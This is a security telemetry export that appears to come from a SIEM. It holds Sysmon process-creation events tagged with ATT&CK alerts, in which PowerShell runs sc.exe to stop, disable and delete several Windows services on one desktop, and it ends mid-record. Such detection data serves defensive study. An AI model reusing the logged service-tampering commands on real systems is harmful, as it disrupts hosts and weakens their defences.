AxInstSV",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.966116000Z"",""eventRecordID"":""2755"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.963\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-00100f672100}\r\nProcessId: 7288\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.963"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-00100f672100}"",""processId"":""7288"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop AxInstSV"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.357",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.951 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-00102b662100} +ProcessId: 4884 +Image: C:\Windows\System32\sc.exe +FileVersion: 
10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config AxInstSV Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config AxInstSV Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.953136800Z"",""eventRecordID"":""2754"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.951\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-00102b662100}\r\nProcessId: 4884\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config AxInstSV Start= Disabled\r\nCurrentDirectory: 
C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.951"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-00102b662100}"",""processId"":""4884"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config AxInstSV Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.292",8,"ATT&CK T1489: Stop 
Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.924 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-00106d642100} +ProcessId: 7352 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop clr_optimization +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop clr_optimization",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.926812600Z"",""eventRecordID"":""2752"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.924\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-00106d642100}\r\nProcessId: 7352\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® 
Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop clr_optimization\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.924"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-00106d642100}"",""processId"":""7352"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop clr_optimization"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.231",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.885 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-0010c6612100} +ProcessId: 5780 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop aspnet_staters +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
aspnet_staters",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.887527900Z"",""eventRecordID"":""2749"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.885\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-0010c6612100}\r\nProcessId: 5780\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.885"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-0010c6612100}"",""processId"":""5780"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop aspnet_staters"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.197",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.860 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-001000602100} +ProcessId: 2652 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WinHelpSvcs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete WinHelpSvcs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.862919000Z"",""eventRecordID"":""2747"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.860\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-001000602100}\r\nProcessId: 2652\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WinHelpSvcs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:29.860"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-001000602100}"",""processId"":""2652"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WinHelpSvcs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.191",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.847 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-0010135f2100} +ProcessId: 7344 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelpSvcs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.850748200Z"",""eventRecordID"":""2746"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.847\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-0010135f2100}\r\nProcessId: 7344\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.847"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-0010135f2100}"",""processId"":""7344"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelpSvcs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.125",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.803 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-0010515c2100} +ProcessId: 1480 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WWW.DDOS.CN.COM +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.805655200Z"",""eventRecordID"":""2743"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.803\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-0010515c2100}\r\nProcessId: 1480\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM\r\nCurrentDirectory: C:\\Users\\John 